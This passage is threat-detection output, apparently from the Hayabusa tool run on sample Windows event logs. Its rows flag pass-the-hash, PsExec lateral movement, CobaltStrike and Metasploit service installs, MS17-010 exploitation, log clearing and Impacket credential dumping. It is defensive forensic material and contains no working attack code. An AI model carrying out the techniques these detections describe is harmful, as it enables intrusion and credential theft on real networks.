Sysmon and Security.evtx -2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\user03 : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 05:33:14.273 
+09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx -2021-04-21 18:27:51.181 +09:00,jump01.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-7036 PSexec service installation.evtx -2021-04-21 18:40:32.342 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56661 : LogonID: 0x1375fbd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.343 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: PSEXESVC.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.347 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56662 : LogonID: 0x1375fd8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56663 : LogonID: 0x1375ff5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.348 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56664 : LogonID: 0x1376003,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.360 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.42.22 : Port: 56666 : LogonID: 
0x1376020,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.362 +09:00,srvdefender01.offsec.lan,4674,critical,SCM Database Privileged Operation,,rules/sigma/builtin/security/win_scm_database_privileged_operation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.501 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.510 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: cmd.exe : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.528 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 18:40:32.529 +09:00,srvdefender01.offsec.lan,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688,4697,5140-5145 PSexec remote execution + admin share.evtx" -2021-04-21 23:56:41.780 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.786 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted 
payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID5145-remote service creation over SMB.evtx -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:41.818 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5145-remote shell execution via SMB admin share.evtx -2021-04-21 23:56:41.897 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as 
Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,high,PowerShell Scripts Installed as Services,,rules/sigma/builtin/security/win_security_powershell_script_installed_as_service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-21 23:56:43.234 +09:00,srvdefender01.offsec.lan,4697,critical,CobaltStrike Service Installations,,rules/sigma/builtin/security/win_security_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-MSF payload deployed via service.evtx -2021-04-22 
17:50:53.614 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: 0Konuy9q8HtkWeKS : IP Address: 10.23.123.11 : Port: 41747 : LogonID: 0x74872,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.686 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: FS03VULN$ : Share 
Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\WindowsPowerShell\v1.0\powershell.exe : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:04.796 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: FS03VULN$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:05.758 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 0x76e83,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.539 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x7777e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:06.554 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60163 : LogonID: 
0x7777e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" 
-2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\MS17_010_psexec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" -2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin 
Logon,User: admmig : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60285 : LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 60232 : LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" -2021-04-22 18:00:13.226 